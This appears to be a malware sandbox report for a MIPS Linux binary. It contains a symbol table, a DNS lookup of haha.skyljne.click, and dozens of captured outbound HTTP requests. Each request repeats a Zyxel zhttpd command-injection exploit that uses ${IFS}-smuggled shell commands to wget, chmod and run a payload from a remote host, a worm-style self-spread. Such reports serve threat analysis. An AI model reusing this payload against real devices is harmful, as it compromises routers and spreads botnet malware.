                                                            __pthread_mutex_unlock_full.symtab0x13c701264FUNC<unknown>DEFAULT2
                                                            __pthread_mutex_unlock_internal.symtab0x1427c8FUNC<unknown>HIDDEN2
                                                            __pthread_mutex_unlock_usercnt.symtab0x14160284FUNC<unknown>HIDDEN2
                                                            __pthread_return_0.symtab0x1e8508FUNC<unknown>DEFAULT2
                                                            __pthread_tpp_change_priority.symtab0x14b00748FUNC<unknown>HIDDEN2
                                                            __pthread_unwind.symtab0x1428484FUNC<unknown>DEFAULT2
                                                            __pthread_unwind_next.symtab0x142d816FUNC<unknown>DEFAULT2
                                                            __read.symtab0x1dcc0100FUNC<unknown>DEFAULT2
                                                            __read_nocancel.symtab0x1dca424FUNC<unknown>DEFAULT2
                                                            __reclaim_stacks.symtab0x130cc548FUNC<unknown>HIDDEN2
                                                            __register_atfork.symtab0x1d7f0392FUNC<unknown>DEFAULT2
                                                            __register_frame_info.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                            __resp.symtab0x04TLS<unknown>DEFAULT8
                                                            __restore_core_regs.symtab0x1657428FUNC<unknown>HIDDEN2
                                                            __rtld_fini.symtab0x321b04OBJECT<unknown>HIDDEN15
                                                            __sched_fifo_max_prio.symtab0x2d1e04OBJECT<unknown>HIDDEN14
                                                            __sched_fifo_min_prio.symtab0x2d1dc4OBJECT<unknown>HIDDEN14
                                                            __set_robust_list_avail.symtab0x322344OBJECT<unknown>HIDDEN15
                                                            __sigaction.symtab0x111b076FUNC<unknown>DEFAULT2
                                                            __sigjmp_save.symtab0x212bc64FUNC<unknown>HIDDEN2
                                                            __sigsetjmp.symtab0x1ede812FUNC<unknown>DEFAULT2
                                                            __stack_user.symtab0x2d4e88OBJECT<unknown>DEFAULT15
                                                            __static_tls_align_m1.symtab0x3222c4OBJECT<unknown>HIDDEN15
                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Jan 28, 2024 10:11:58.360439062 CET192.168.2.138.8.8.80xb8Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Jan 28, 2024 10:11:58.465261936 CET8.8.8.8192.168.2.130xb8No error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            0192.168.2.134612646.191.239.140443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.383013964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1192.168.2.1357870104.142.190.254443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.383111000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            2192.168.2.134738862.201.5.129443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.383183002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            3192.168.2.133848696.176.141.234443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.383198023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            4192.168.2.1349214222.253.157.210443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.383249998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            5192.168.2.1353264211.206.247.19443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.383272886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            6192.168.2.135148089.191.92.16443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.383272886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            7192.168.2.1356340158.109.221.0443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.383287907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            8192.168.2.133620096.139.121.208443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.383313894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            9192.168.2.1338038191.205.54.16443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.383333921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            10192.168.2.135932627.182.15.243443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.383388042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            11192.168.2.135460093.23.149.29443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.383433104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            12192.168.2.135829841.97.179.167443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.383505106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            13192.168.2.135879650.178.9.59443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.383569956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            14192.168.2.1352998136.222.118.118443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.383658886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            15192.168.2.1343162151.71.167.80443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.383717060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            16192.168.2.13346085.149.85.51443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.383723974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            17192.168.2.1334852189.189.38.128443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.383770943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            18192.168.2.134542647.222.61.131443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.383805037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            19192.168.2.1347974173.98.200.14443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.383807898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            20192.168.2.1339774130.185.18.239443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.383869886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            21192.168.2.1350454170.151.98.133443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.383912086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            22192.168.2.135075471.53.250.168443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.383986950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            23192.168.2.134345636.20.42.162443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.384044886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            24192.168.2.134354282.84.150.83443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.384085894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            25192.168.2.1348228142.1.11.129443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.384109974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            26192.168.2.1354848120.161.200.114443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.384154081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            27192.168.2.1352724149.22.183.60443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.384187937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            28192.168.2.134519467.100.212.178443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.384247065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            29192.168.2.134928073.41.180.9443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.384289980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            30192.168.2.1350922135.240.134.186443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.384344101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            31192.168.2.1353740217.46.81.98443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.384349108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            32192.168.2.1335160210.118.131.183443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.384377956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            33192.168.2.1345498178.160.35.106443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.384459019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            34192.168.2.13400381.132.253.126443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.384526014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            35192.168.2.1360164209.221.143.8443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.384579897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            36192.168.2.135877889.0.146.130443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.384581089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            37192.168.2.1333434201.154.91.15443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.384617090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            38192.168.2.134132678.148.203.101443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.384680986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            39192.168.2.1350006117.151.239.236443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.384685993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            40192.168.2.134002820.53.251.253443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.384773016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            41192.168.2.134442883.188.225.175443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.384804964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            42192.168.2.1337200114.116.30.39443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.384836912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            43192.168.2.133515417.195.52.112443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.384874105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            44192.168.2.133918225.70.61.231443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.384943962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            45192.168.2.134154273.51.226.166443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.384946108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            46192.168.2.1351508206.150.153.209443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.384975910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            47192.168.2.13328469.208.205.5443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.384994030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            48192.168.2.135172262.131.144.91443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.385102987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            49192.168.2.133408223.246.213.154443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.385137081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            50192.168.2.1333508119.110.120.49443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.385205030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            51192.168.2.1336530123.188.214.46443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.385205984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            52192.168.2.1356318149.64.76.137443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.385251999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            53192.168.2.135472665.119.91.115443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.385282993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            54192.168.2.133897457.3.150.70443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.385308981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            55192.168.2.135279047.124.63.28443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.385390043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            56192.168.2.1354934145.59.12.83443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.385390043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


